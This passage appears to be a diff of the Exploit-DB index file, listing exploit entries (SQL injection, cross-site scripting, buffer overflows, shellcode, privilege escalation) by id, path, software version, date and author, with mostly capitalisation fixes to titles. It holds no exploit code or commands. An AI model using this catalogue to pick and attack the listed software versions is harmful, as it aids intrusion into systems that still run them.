+22463,platforms/php/webapps/22463.txt,"Wordpress Spider Catalog 1.1 Plugin - HTML Code Injection / Cross-Site Scripting",2012-11-04,D4NB4R,php,webapps,0 22464,platforms/windows/dos/22464.txt,"Adobe Reader 11.0.0 - Stack Overflow Crash PoC",2012-11-04,coolkaveh,windows,dos,0 22465,platforms/windows/local/22465.txt,"Sysax FTP Automation Server 5.33 - Privilege Escalation",2012-11-04,"Craig Freyman",windows,local,0 22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - SEH Stack Overflow ROP-based Exploit (ASLR + DEP Bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0 @@ -19727,24 +19727,24 @@ id,file,description,date,author,platform,type,port 22478,platforms/php/webapps/22478.txt,"PHPay 2.2 - Cross-Site Scripting",2003-04-09,"Ahmet Sabri ALPER",php,webapps,0 22479,platforms/linux/remote/22479.c,"PoPToP PPTP 1.0/1.1.x - Negative read() Argument Remote Buffer Overflow",2003-04-09,"John Leach",linux,remote,0 22480,platforms/hardware/remote/22480.txt,"Linksys BEFVP4 - SNMP Community String Information Disclosure",2003-04-09,"Branson Matheson",hardware,remote,0 -22481,platforms/cgi/webapps/22481.txt,"Super Guestbook 1.0 - Sensitive Information Disclosure",2002-04-10,Over_G,cgi,webapps,0 +22481,platforms/cgi/webapps/22481.txt,"Super GuestBook 1.0 - Sensitive Information Disclosure",2002-04-10,Over_G,cgi,webapps,0 22482,platforms/cgi/webapps/22482.txt,"Guestbook 4.0 - Sensitive Information Disclosure",2003-04-10,Over_G,cgi,webapps,0 -22483,platforms/osx/dos/22483.c,"MacOS X 10.x - DirectoryService Denial of Service",2003-04-10,"Neeko Oni",osx,dos,0 -22484,platforms/asp/webapps/22484.txt,"Ocean12 ASP Guestbook Manager 1.0 - Information Disclosure",2003-04-11,drG4njubas,asp,webapps,0 +22483,platforms/osx/dos/22483.c,"Mac OSX 10.x - DirectoryService Denial of Service",2003-04-10,"Neeko Oni",osx,dos,0 +22484,platforms/asp/webapps/22484.txt,"Ocean12 ASP GuestBook Manager 1.0 - Information Disclosure",2003-04-11,drG4njubas,asp,webapps,0 22485,platforms/linux/remote/22485.c,"SheerDNS 1.0 - Information Disclosure",2003-04-14,"Jedi/Sector One",linux,remote,0 22486,platforms/cfm/webapps/22486.txt,"InstaBoard 1.3 - Index.cfm SQL Injection",2003-04-14,"Jim Dew",cfm,webapps,0 22487,platforms/asp/webapps/22487.txt,"Web Wiz Site News 3.6 - Information Disclosure",2003-04-14,drG4njubas,asp,webapps,0 22488,platforms/windows/remote/22488.txt,"EZ Publish 2.2.7/3.0 - site.ini Information Disclosure",2003-04-15,"gregory Le Bras",windows,remote,0 -22489,platforms/windows/shellcode/22489.cpp,"Windows XP Pro SP3 - Full ROP calc shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0 +22489,platforms/windows/shellcode/22489.cpp,"Windows XP Pro SP3 - Full ROP calc Shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0 22490,platforms/multiple/webapps/22490.txt,"ZPanel 10.0.1 - Cross-Site Request Forgery / Cross-Site Scripting / SQL Injection / Password Reset",2012-11-05,pcsjj,multiple,webapps,0 22491,platforms/php/webapps/22491.txt,"EZ Publish 2.2.7/3.0 - Multiple Cross-Site Scripting Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0 22501,platforms/php/webapps/22501.txt,"Xonic.ru News 1.0 - script.php Remote Command Execution",2003-03-31,"DWC Gr0up",php,webapps,0 22492,platforms/php/webapps/22492.txt,"EZ Publish 2.2.7/3.0 - Multiple Full Path Disclosure Vulnerabilities",2003-04-15,"gregory Le Bras",php,webapps,0 22493,platforms/hardware/webapps/22493.txt,"CheckPoint/Sofaware Firewall - Multiple Vulnerabilities",2012-11-05,Procheckup,hardware,webapps,0 -22494,platforms/php/dos/22494.txt,"OSCommerce 2.2 - Product_Info.php Denial of Service",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,dos,0 +22494,platforms/php/dos/22494.txt,"osCommerce 2.2 - Product_Info.php Denial of Service",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,dos,0 22496,platforms/multiple/remote/22496.txt,"Python 2.2/2.3 - Documentation Server Error Page Cross-Site Scripting",2003-04-15,euronymous,multiple,remote,0 22497,platforms/multiple/remote/22497.txt,"12Planet Chat Server 2.5 - Error Message Installation Full Path Disclosure",2003-04-11,"Dennis Rand",multiple,remote,0 -22498,platforms/php/webapps/22498.txt,"OSCommerce 2.2 - Authentication Bypass",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +22498,platforms/php/webapps/22498.txt,"osCommerce 2.2 - Authentication Bypass",2003-04-15,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22499,platforms/cgi/webapps/22499.pl,"IkonBoard 3.1 - Lang Cookie Arbitrary Command Execution (1)",2003-04-15,"Nick Cleaton",cgi,webapps,0 22500,platforms/cgi/webapps/22500.pl,"IkonBoard 3.1 - Lang Cookie Arbitrary Command Execution (2)",2003-05-05,snooq,cgi,webapps,0 22502,platforms/multiple/dos/22502.pl,"TW-WebServer 1.0 - Denial of Service (1)",2003-04-15,badpack3t,multiple,dos,0 @@ -19768,7 +19768,7 @@ id,file,description,date,author,platform,type,port 22522,platforms/multiple/remote/22522.pl,"Web Protector 2.0 - Trivial Encryption",2003-04-22,rjfix,multiple,remote,0 22570,platforms/windows/remote/22570.java,"Microsoft Windows Media Player 7.1 - Skin File Code Execution",2003-05-07,"Jelmer Kuperus",windows,remote,0 22571,platforms/cgi/webapps/22571.pl,"HappyMall E-Commerce Software 4.3/4.4 - Normal_HTML.cgi Command Execution",2003-05-07,"Revin Aldi",cgi,webapps,0 -22524,platforms/php/webapps/22524.txt,"zenphoto 1.4.3.3 - Multiple Vulnerabilities",2012-11-06,waraxe,php,webapps,0 +22524,platforms/php/webapps/22524.txt,"ZenPhoto 1.4.3.3 - Multiple Vulnerabilities",2012-11-06,waraxe,php,webapps,0 22525,platforms/windows/remote/22525.rb,"EMC Networker - Format String",2012-11-07,Metasploit,windows,remote,0 22526,platforms/windows/remote/22526.rb,"WinRM - VBS Remote Code Execution",2012-11-07,Metasploit,windows,remote,0 22527,platforms/linux/dos/22527.c,"Xeneo Web Server 2.2.10 - Undisclosed Buffer Overflow",2003-04-23,badpack3t,linux,dos,0 @@ -19949,7 +19949,7 @@ id,file,description,date,author,platform,type,port 22705,platforms/php/webapps/22705.txt,"Webfroot Shoutbox 2.32 - Expanded.php Remote Directory Traversal",2003-06-02,_6mO_HaCk,php,webapps,0 22706,platforms/windows/dos/22706.asm,"Crob FTP Server 2.50.4 - Remote Username Format String",2003-06-02,"Luca Ercoli",windows,dos,0 22707,platforms/windows/dos/22707.txt,"Novell Groupwise Internet Agent - LDAP BIND Request Overflow",2012-11-14,"Francis Provencher",windows,dos,0 -22708,platforms/php/webapps/22708.txt,"dotproject 2.1.6 - Remote File Inclusion",2012-11-14,dun,php,webapps,0 +22708,platforms/php/webapps/22708.txt,"dotProject 2.1.6 - Remote File Inclusion",2012-11-14,dun,php,webapps,0 22709,platforms/php/webapps/22709.txt,"Narcissus - Remote Command Execution",2012-11-14,dun,php,webapps,0 22713,platforms/php/webapps/22713.txt,"MYRE Realty Manager - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 22710,platforms/php/webapps/22710.txt,"friendsinwar FAQ Manager - SQL Injection (Authentication Bypass)",2012-11-14,d3b4g,php,webapps,0 @@ -20038,10 +20038,10 @@ id,file,description,date,author,platform,type,port 22797,platforms/hardware/dos/22797.txt,"Avaya Cajun P130/P133/P330/P333 Network Switch - Connection Stalling Denial of Service",2003-06-18,"Jacek Lipkowski",hardware,dos,0 22798,platforms/php/webapps/22798.txt,"phpMyAdmin 2.x - Information Disclosure",2003-06-18,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps,0 22799,platforms/cgi/webapps/22799.txt,"Kerio MailServer 5.6.3 - Web Mail ADD_ACL Module Cross-Site Scripting",2003-06-18,"David F.Madrid",cgi,webapps,0 -22800,platforms/linux/dos/22800.txt,"Kerio Mailserver 5.6.3 subscribe Module - Overflow",2003-06-18,"David F.Madrid",linux,dos,0 +22800,platforms/linux/dos/22800.txt,"Kerio Mailserver 5.6.3 subscribe Module - Overflow Exploit",2003-06-18,"David F.Madrid",linux,dos,0 22801,platforms/linux/dos/22801.txt,"Kerio Mailserver 5.6.3 - add_acl Module Overflow",2003-06-18,"David F.Madrid",linux,dos,0 -22802,platforms/linux/dos/22802.txt,"Kerio Mailserver 5.6.3 list Module - Overflow",2003-06-18,"David F.Madrid",linux,dos,0 -22803,platforms/linux/dos/22803.txt,"Kerio Mailserver 5.6.3 do_map Module - Overflow",2003-06-18,"David F.Madrid",linux,dos,0 +22802,platforms/linux/dos/22802.txt,"Kerio Mailserver 5.6.3 list Module - Overflow Exploit",2003-06-18,"David F.Madrid",linux,dos,0 +22803,platforms/linux/dos/22803.txt,"Kerio Mailserver 5.6.3 do_map Module - Overflow Exploit",2003-06-18,"David F.Madrid",linux,dos,0 22804,platforms/cgi/webapps/22804.txt,"Kerio MailServer 5.6.3 - Web Mail DO_MAP Module Cross-Site Scripting",2003-06-18,"David F.Madrid",cgi,webapps,0 22805,platforms/jsp/webapps/22805.txt,"Tmax Soft JEUS 3.1.4 p1 - URL.jsp Cross-Site Scripting",2003-06-17,"Jeremy Bae",jsp,webapps,0 22806,platforms/linux/local/22806.sh,"SDFingerD 1.1 - Failure To Drop Privileges Privilege Escalation",2003-06-19,V9,linux,local,0 @@ -20090,7 +20090,7 @@ id,file,description,date,author,platform,type,port 22850,platforms/windows/dos/22850.txt,"Microsoft Office OneNote 2010 - Crash PoC",2012-11-20,coolkaveh,windows,dos,0 22851,platforms/windows/local/22851.py,"FormatFactory 3.0.1 - Profile File Handling Buffer Overflow",2012-11-20,"Julien Ahrens",windows,local,0 22852,platforms/multiple/webapps/22852.txt,"SonicWALL CDP 5040 6.x - Multiple Vulnerabilities",2012-11-20,Vulnerability-Lab,multiple,webapps,0 -22853,platforms/php/webapps/22853.txt,"WordPress Facebook Survey 1.0 Plugin - SQL Injection",2012-11-20,"Vulnerability Research Laboratory",php,webapps,0 +22853,platforms/php/webapps/22853.txt,"Wordpress Facebook Survey 1.0 Plugin - SQL Injection",2012-11-20,"Vulnerability Research Laboratory",php,webapps,0 22854,platforms/windows/remote/22854.txt,"LAN.FS Messenger 2.4 - Command Execution",2012-11-20,Vulnerability-Lab,windows,remote,0 22855,platforms/windows/dos/22855.txt,"Apple QuickTime 7.7.2 - Targa image Buffer Overflow",2012-11-20,"Senator of Pirates",windows,dos,0 22856,platforms/linux/remote/22856.rb,"Narcissus Image Configuration - Passthru",2012-11-21,Metasploit,linux,remote,0 @@ -20119,7 +20119,7 @@ id,file,description,date,author,platform,type,port 22879,platforms/windows/webapps/22879.txt,"ManageEngine ServiceDesk 8.0 - Multiple Vulnerabilities",2012-11-21,Vulnerability-Lab,windows,webapps,0 23034,platforms/windows/remote/23034.txt,"Microsoft URLScan 2.5/RSA Security SecurID 5.0 - Configuration Enumeration",2003-08-14,"Andy Davis",windows,remote,0 23035,platforms/asp/webapps/23035.txt,"Poster 2.0 - Unauthorized Privileged User Access",2003-08-15,DarkKnight,asp,webapps,0 -23036,platforms/php/webapps/23036.txt,"MatrikzGB Guestbook 2.0 - Administrative Privilege Escalation",2003-08-16,"Stephan Sattler",php,webapps,0 +23036,platforms/php/webapps/23036.txt,"MatrikzGB GuestBook 2.0 - Administrative Privilege Escalation",2003-08-16,"Stephan Sattler",php,webapps,0 23037,platforms/windows/local/23037.txt,"DWebPro 3.4.1 - Http.ini Plaintext Password Storage",2003-08-18,rUgg1n3,windows,local,0 22881,platforms/php/webapps/22881.txt,"PHP Server Monitor - Persistent Cross-Site Scripting",2012-11-21,loneferret,php,webapps,0 22882,platforms/windows/local/22882.c,"Microsoft Windows 2000 - CreateFile API Named Pipe Privilege Escalation (1)",2003-07-08,Maceo,windows,local,0 @@ -20158,7 +20158,7 @@ id,file,description,date,author,platform,type,port 22944,platforms/windows/remote/22944.txt,"Savant Web Server 3.1 - CGITest.HTML Cross-Site Scripting",2003-07-21,dr_insane,windows,remote,0 22945,platforms/windows/dos/22945.txt,"Savant Webserver 3.1 - Denial of Service",2003-07-21,dr_insane,windows,dos,0 22946,platforms/windows/local/22946.txt,"MySQL AB ODBC Driver 3.51 - Plain Text Password",2003-07-22,hanez,windows,local,0 -22947,platforms/hardware/dos/22947.c,"3Com DSL Router 812 1.1.7/1.1.9/2.0 - Administrative Interface Long Request Router Denial of Service",2003-07-21,"David F.Madrid",hardware,dos,0 +22947,platforms/hardware/dos/22947.c,"3Com DSL Router 812 1.1.7/1.1.9/2.0 - Administrative Interface Long Request Denial of Service",2003-07-21,"David F.Madrid",hardware,dos,0 22948,platforms/php/webapps/22948.txt,"MoreGroupWare 0.6.8 - WEBMAIL2_INC_DIR Remote File Inclusion",2003-07-21,"phil dunn",php,webapps,0 22949,platforms/netware/dos/22949.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - CGI2Perl.NLM Buffer Overflow",2003-07-23,"Uffe Nielsen",netware,dos,0 22950,platforms/hardware/dos/22950.txt,"Xavi X7028r DSL Router - UPNP Long Request Denial of Service",2003-07-23,"David F. Madrid",hardware,dos,0 @@ -20203,7 +20203,7 @@ id,file,description,date,author,platform,type,port 23011,platforms/php/webapps/23011.txt,"PHPOutSourcing Zorum 3.x - Cross-Site Scripting",2003-08-11,G00db0y,php,webapps,0 23012,platforms/php/webapps/23012.txt,"News Wizard 2.0 - Full Path Disclosure",2003-08-11,G00db0y,php,webapps,0 23013,platforms/php/webapps/23013.txt,"PHP Website 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module - SQL Injection",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -23014,platforms/php/webapps/23014.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 calendar Module - 'day' Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +23014,platforms/php/webapps/23014.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module - 'day' Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23015,platforms/php/webapps/23015.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 fatcat Module - fatcat_id Parameter Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23016,platforms/php/webapps/23016.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 - pagemaster Module PAGE_id Parameter Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22935,platforms/multiple/dos/22935.txt,"Websense Proxy - Filter Bypass",2012-11-26,"Nahuel Grisolia",multiple,dos,0 @@ -20401,7 +20401,7 @@ id,file,description,date,author,platform,type,port 23174,platforms/multiple/remote/23174.txt,"TCLHttpd 3.4.2 - Multiple Cross-Site Scripting Vulnerabilities",2003-09-24,"Phuong Nguyen",multiple,remote,0 23175,platforms/php/webapps/23175.txt,"yMonda Thread-IT 1.6 - Multiple Fields HTML Injection",2003-09-24,"Bahaa Naamneh",php,webapps,0 23176,platforms/multiple/remote/23176.txt,"NullLogic Null HTTPd 0.5.1 - Error Page Long HTTP Request Cross-Site Scripting",2003-09-24,"Luigi Auriemma",multiple,remote,0 -23177,platforms/windows/dos/23177.txt,"NVIDIA Install Application 2.1002.85.551 - (NVI2.dll) Unicode Buffer Overflow PoC",2012-12-06,LiquidWorm,windows,dos,0 +23177,platforms/windows/dos/23177.txt,"Nvidia Install Application 2.1002.85.551 - (NVI2.dll) Unicode Buffer Overflow PoC",2012-12-06,LiquidWorm,windows,dos,0 23178,platforms/multiple/remote/23178.rb,"Adobe IndesignServer 5.5 - SOAP Server Arbitrary Script Execution",2012-12-06,Metasploit,multiple,remote,0 23179,platforms/windows/remote/23179.rb,"Oracle MySQL for Microsoft Windows - MOF Execution",2012-12-06,Metasploit,windows,remote,0 23180,platforms/php/webapps/23180.txt,"Kordil EDms 2.2.60rc3 - SQL Injection",2012-12-06,"Woody Hughes",php,webapps,0 @@ -20437,7 +20437,7 @@ id,file,description,date,author,platform,type,port 23210,platforms/windows/local/23210.c,"Microsoft Windows XP/2000 - PostThreadMessage() Arbitrary Process Killing",2003-10-02,"Brett Moore",windows,local,0 23211,platforms/windows/remote/23211.cpp,"EarthStation 5 - Search Service Remote File Deletion",2003-10-03,"random nut",windows,remote,0 23212,platforms/hardware/remote/23212.txt,"Cisco LEAP - Password Disclosure",2003-10-03,"Cisco Security",hardware,remote,0 -23213,platforms/php/webapps/23213.txt,"WordPress 0.6/0.7 - Blog.Header.php SQL Injection",2003-10-03,"Seth Woolley",php,webapps,0 +23213,platforms/php/webapps/23213.txt,"Wordpress 0.6/0.7 - Blog.Header.php SQL Injection",2003-10-03,"Seth Woolley",php,webapps,0 23214,platforms/cgi/webapps/23214.txt,"Sun Cobalt RaQ 1.1/2.0/3.0/4.0 - Message.cgi Cross-Site Scripting",2003-10-03,"Lorenzo Hernandez Garcia-Hierro",cgi,webapps,0 23215,platforms/windows/dos/23215.html,"Microsoft Internet Explorer 6 - Absolute Position Block Denial of Service",2003-10-03,"Nick Johnson",windows,dos,0 23216,platforms/windows/dos/23216.txt,"Microsoft Word 97/98/2002 - Malformed Document Denial of Service",2003-10-03,"Bahaa Naamneh",windows,dos,0 @@ -20506,7 +20506,7 @@ id,file,description,date,author,platform,type,port 23389,platforms/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 sysctl - Local Denial of Service",2003-11-19,anonymous,openbsd,dos,0 23279,platforms/windows/dos/23279.txt,"DIMIN Viewer 5.4.0 - Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0 23280,platforms/windows/dos/23280.txt,"FreeVimager 4.1.0 - Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0 -23282,platforms/multiple/remote/23282.txt,"apache cocoon 2.14/2.2 - Directory Traversal",2003-10-24,"Thierry De Leeuw",multiple,remote,0 +23282,platforms/multiple/remote/23282.txt,"Apache cocoon 2.14/2.2 - Directory Traversal",2003-10-24,"Thierry De Leeuw",multiple,remote,0 23283,platforms/windows/remote/23283.txt,"Microsoft Internet Explorer 6.0 - Local Resource Reference",2003-10-24,Mindwarper,windows,remote,0 23284,platforms/php/webapps/23284.txt,"MyBB Bank- 3 Plugin - SQL Injection",2012-12-11,Red_Hat,php,webapps,0 23314,platforms/multiple/dos/23314.c,"Serious Sam Engine 1.0.5 - Remote Denial of Service",2003-10-30,"Luigi Auriemma",multiple,dos,0 @@ -20519,7 +20519,7 @@ id,file,description,date,author,platform,type,port 23291,platforms/multiple/remote/23291.txt,"Opera Web Browser 7 - IFRAME Zone Restriction Bypass",2003-10-24,Mindwarper,multiple,remote,0 23292,platforms/multiple/dos/23292.java,"Sun Microsystems Java Virtual Machine 1.x - Security Manager Denial of Service",2003-10-26,"Marc Schoenefeld",multiple,dos,0 23293,platforms/windows/dos/23293.txt,"Yahoo! Messenger 5.6 - File Transfer Buffer Overrun",2003-10-27,"Hat-Squad Security Team",windows,dos,0 -23294,platforms/php/webapps/23294.txt,"Chi Kien Uong Guestbook 1.51 - Cross-Site Scripting",2003-10-27,"Joshua P. Miller",php,webapps,0 +23294,platforms/php/webapps/23294.txt,"Chi Kien Uong GuestBook 1.51 - Cross-Site Scripting",2003-10-27,"Joshua P. Miller",php,webapps,0 23295,platforms/linux/remote/23295.txt,"SH-HTTPD 0.3/0.4 - Character Filtering Remote Information Disclosure",2003-10-27,"dong-h0un U",linux,remote,0 23296,platforms/linux/remote/23296.txt,"Red Hat Apache 2.0.40 - Directory Index Default Configuration Error",2003-10-27,TfM,linux,remote,0 23297,platforms/linux/local/23297.c,"Musicqueue 1.2 - SIGSEGV Signal Handler Insecure File Creation",2003-10-27,"dong-h0un U",linux,local,0 @@ -20555,7 +20555,7 @@ id,file,description,date,author,platform,type,port 23329,platforms/windows/remote/23329.c,"Nullsoft SHOUTcast 1.9.2 - icy-name/icy-url Memory Corruption (2)",2003-11-03,exworm,windows,remote,0 23330,platforms/php/webapps/23330.txt,"Synthetic Reality SymPoll 1.5 - Cross-Site Scripting",2003-11-03,"Michael Frame",php,webapps,0 23331,platforms/asp/webapps/23331.txt,"Web Wiz Forum 6.34/7.0/7.5 - Unauthorized Private Forum Access",2003-11-03,"Alexander Antipov",asp,webapps,0 -23332,platforms/cgi/webapps/23332.txt,"MPM Guestbook 1.2 - Cross-Site Scripting",2003-11-03,"David Ferreira",cgi,webapps,0 +23332,platforms/cgi/webapps/23332.txt,"MPM GuestBook 1.2 - Cross-Site Scripting",2003-11-03,"David Ferreira",cgi,webapps,0 23333,platforms/php/webapps/23333.txt,"PHPKit 1.6 - Include.php Cross-Site Scripting",2003-11-02,ben.moeckel@badwebmasters.net,php,webapps,0 23334,platforms/windows/remote/23334.pl,"IA WebMail Server 3.0/3.1 - Long GET Request Buffer Overrun",2003-11-03,"Peter Winter-Smith",windows,remote,0 23335,platforms/asp/webapps/23335.txt,"VieNuke VieBoard 2.6 - SQL Injection",2003-11-03,ekerazha@yahoo.it,asp,webapps,0 @@ -20579,8 +20579,8 @@ id,file,description,date,author,platform,type,port 23353,platforms/php/webapps/23353.txt,"MyYoutube MyBB Plugin 1.0 - SQL Injection",2012-12-13,Zixem,php,webapps,0 23354,platforms/php/webapps/23354.txt,"MyBB AJAX Chat - Persistent Cross-Site Scripting",2012-12-13,"Mr. P-teo",php,webapps,0 23355,platforms/php/webapps/23355.txt,"Facebook Profile MyBB Plugin 2.4 - Persistant Cross-Site Scripting",2012-12-13,limb0,php,webapps,0 -23356,platforms/php/webapps/23356.txt,"Portable phpMyAdmin WordPress Plugin - Authentication Bypass",2012-12-13,"Mark Stanislav",php,webapps,0 -23384,platforms/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 - $path Remote File Inclusion",2003-11-17,"RusH security team",php,webapps,0 +23356,platforms/php/webapps/23356.txt,"Portable phpMyAdmin Wordpress Plugin - Authentication Bypass",2012-12-13,"Mark Stanislav",php,webapps,0 +23384,platforms/php/webapps/23384.txt,"Koch Roland Rolis GuestBook 1.0 - $path Remote File Inclusion",2003-11-17,"RusH security team",php,webapps,0 23385,platforms/multiple/remote/23385.txt,"PostMaster 3.16/3.17 Proxy Service - Cross-Site Scripting",2003-11-17,"Ziv Kamir",multiple,remote,0 23382,platforms/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 - Cross-Site Scripting",2012-12-14,s3m00t,php,webapps,0 23386,platforms/php/webapps/23386.txt,"Justin Hagstrom Auto Directory Index 1.2.3 - Cross-Site Scripting",2003-11-17,"David Sopas Ferreira",php,webapps,0 @@ -20624,7 +20624,7 @@ id,file,description,date,author,platform,type,port 23406,platforms/php/webapps/23406.txt,"CuteNews 1.3 - Debug Query Information Disclosure",2003-12-01,scrap,php,webapps,0 23407,platforms/asp/webapps/23407.txt,"Virtual Programming VP-ASP 4.00/5.00 - shopsearch.asp SQL Injection",2003-12-01,"Nick Gudov",asp,webapps,0 23408,platforms/asp/webapps/23408.txt,"Virtual Programming VP-ASP 4.00/5.00 - shopdisplayproducts.asp SQL Injection",2003-12-01,"Nick Gudov",asp,webapps,0 -23409,platforms/cgi/webapps/23409.c,"Jason Maloney's Guestbook 3.0 - Remote Command Execution",2003-12-01,shaun2k2,cgi,webapps,0 +23409,platforms/cgi/webapps/23409.c,"Jason Maloney's GuestBook 3.0 - Remote Command Execution",2003-12-01,shaun2k2,cgi,webapps,0 23410,platforms/cgi/webapps/23410.txt,"IBM Directory Server 4.1 - Web Administration Interface Cross-Site Scripting",2003-12-02,"Oliver Karow",cgi,webapps,0 23411,platforms/windows/remote/23411.txt,"Websense Enterprise 4/5 - Blocked Sites Cross-Site Scripting",2003-12-03,"Mr. P.Taylor",windows,remote,0 23412,platforms/windows/dos/23412.pl,"EZPhotoShare 1.0/1.1 - Memory Corruption",2003-12-03,Winter-Smith,windows,dos,0 @@ -20712,7 +20712,7 @@ id,file,description,date,author,platform,type,port 23496,platforms/windows/dos/23496.txt,"DIMIN Viewer 5.4.0 - GIF Decode Crash PoC",2012-12-19,"Lizhi Wang",windows,dos,0 23693,platforms/windows/dos/23693.txt,"Sami FTP Server 1.1.3 - Library Crafted GET Request Remote Denial of Service",2004-02-13,"intuit e.b.",windows,dos,0 23695,platforms/windows/remote/23695.txt,"Microsoft Internet Explorer 5.0.1 - ITS Protocol Zone Bypass",2004-02-13,anonymous,windows,remote,0 -23498,platforms/hardware/webapps/23498.txt,"SonicWall SonicOS 5.8.1.8 WAF - Cross-Site Scripting",2012-12-19,Vulnerability-Lab,hardware,webapps,0 +23498,platforms/hardware/webapps/23498.txt,"SonicWALL SonicOS 5.8.1.8 WAF - Cross-Site Scripting",2012-12-19,Vulnerability-Lab,hardware,webapps,0 23499,platforms/hardware/webapps/23499.txt,"Enterpriser16 Load Balancer 7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-12-19,Vulnerability-Lab,hardware,webapps,0 23500,platforms/windows/remote/23500.rb,"InduSoft Web Studio - ISSymbol.ocx InternationalSeparator() Heap Overflow",2012-12-20,Metasploit,windows,remote,0 23628,platforms/php/webapps/23628.txt,"JBrowser 1.0/2.x - Unauthorized Admin Access",2004-01-30,"Himeur Nourredine",php,webapps,0 @@ -20720,7 +20720,7 @@ id,file,description,date,author,platform,type,port 23502,platforms/windows/remote/23502.c,"Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (2)",2003-12-29,"Rosiello Security",windows,remote,0 23503,platforms/windows/remote/23503.txt,"NETObserve 2.0 - Authentication Bypass",2003-12-29,"Peter Winter-Smith",windows,remote,0 23504,platforms/windows/dos/23504.txt,"Microsoft Windows XP/2000 - showHelp CHM File Execution",2003-12-30,"Arman Nayyeri",windows,dos,0 -23505,platforms/osx/dos/23505.c,"Apple MacOS X 10.x - SecurityServer Daemon Local Denial of Service",2003-12-30,"Matt Burnett",osx,dos,0 +23505,platforms/osx/dos/23505.c,"Apple Mac OSX 10.x - SecurityServer Daemon Local Denial of Service",2003-12-30,"Matt Burnett",osx,dos,0 23506,platforms/windows/dos/23506.txt,"GoodTech Telnet Server 4.0 - Remote Denial of Service",2004-01-02,"Donato Ferrante",windows,dos,0 23507,platforms/php/webapps/23507.txt,"EasyDynamicPages 1.0 - config_page.php Remote PHP File Include",2004-01-02,tsbeginnervn,php,webapps,0 23508,platforms/hardware/dos/23508.txt,"YaSoft Switch Off 2.3 - Large Packet Remote Denial of Service",2004-01-02,"Peter Winter-Smith",hardware,dos,0 @@ -20736,14 +20736,14 @@ id,file,description,date,author,platform,type,port 23518,platforms/php/webapps/23518.txt,"HotNews 0.x - config[incdir] Parameter Remote File Inclusion",2004-01-05,Officerrr,php,webapps,0 23519,platforms/php/webapps/23519.txt,"FreznoShop 1.2.3/1.3 - Search Script Cross-Site Scripting",2004-01-04,"David S. Ferreira",php,webapps,0 23520,platforms/php/webapps/23520.txt,"PhpGedView 2.61 - Multiple PHP Remote File Inclusion",2004-01-06,Windak,php,webapps,0 -23691,platforms/php/webapps/23691.txt,"VBulletin 3.0 - Search.php Cross-Site Scripting",2004-02-13,"Rafel Ivgi The-Insider",php,webapps,0 +23691,platforms/php/webapps/23691.txt,"vBulletin 3.0 - Search.php Cross-Site Scripting",2004-02-13,"Rafel Ivgi The-Insider",php,webapps,0 23692,platforms/windows/dos/23692.txt,"Sami FTP Server 1.1.3 - Invalid Command Argument Local Denial of Service",2004-02-13,"intuit e.b.",windows,dos,0 23522,platforms/multiple/remote/23522.rb,"NetWin SurgeFTP - Authenticated Admin Command Injection (Metasploit)",2012-12-20,"Spencer McIntyre",multiple,remote,0 23523,platforms/linux/dos/23523.c,"gdb (GNU debugger) 7.5.1 - NULL Pointer Dereference",2012-12-20,nitr0us,linux,dos,0 23524,platforms/multiple/dos/23524.c,"IDA Pro 6.3 - Crash PoC",2012-12-20,nitr0us,multiple,dos,0 23525,platforms/php/webapps/23525.txt,"PhpGedView 2.61 - Search Script Cross-Site Scripting",2004-01-06,Windak,php,webapps,0 23526,platforms/php/webapps/23526.txt,"PhpGedView 2.61 - PHPInfo Information Disclosure",2004-01-06,Windak,php,webapps,0 -23527,platforms/hardware/remote/23527.txt,"ZyXEL ZyWALL 10 Management Interface - Cross-Site Scripting",2004-01-06,"Rafel Ivgi",hardware,remote,0 +23527,platforms/hardware/remote/23527.txt,"ZYXEL ZyWALL 10 Management Interface - Cross-Site Scripting",2004-01-06,"Rafel Ivgi",hardware,remote,0 23528,platforms/hardware/remote/23528.txt,"Edimax AR-6004 ADSL Router - Management Interface Cross-Site Scripting",2004-01-06,"Rafel Ivgi",hardware,remote,0 23529,platforms/windows/remote/23529.txt,"SnapStream PVS Lite 2.0 - Cross-Site Scripting",2004-01-06,"Rafel Ivgi",windows,remote,0 23530,platforms/windows/dos/23530.c,"Kroum Grigorov KpyM Telnet Server 1.0 - Remote Denial of Service",2004-01-07,NoRpiuS,windows,dos,0 @@ -20842,7 +20842,7 @@ id,file,description,date,author,platform,type,port 23625,platforms/php/webapps/23625.txt,"MyBB AwayList Plugin - (index.php id parameter) SQL Injection",2012-12-24,Red_Hat,php,webapps,0 23686,platforms/windows/dos/23686.txt,"Monkey HTTP Daemon 0.x - Missing Host Field Denial of Service",2004-02-11,"Luigi Auriemma",windows,dos,0 23687,platforms/php/webapps/23687.txt,"Macallan Mail Solution Macallan Mail Solution 2.8.4.6 (Build 260) - Web Interface Authentication Bypass",2004-02-12,"Ziv 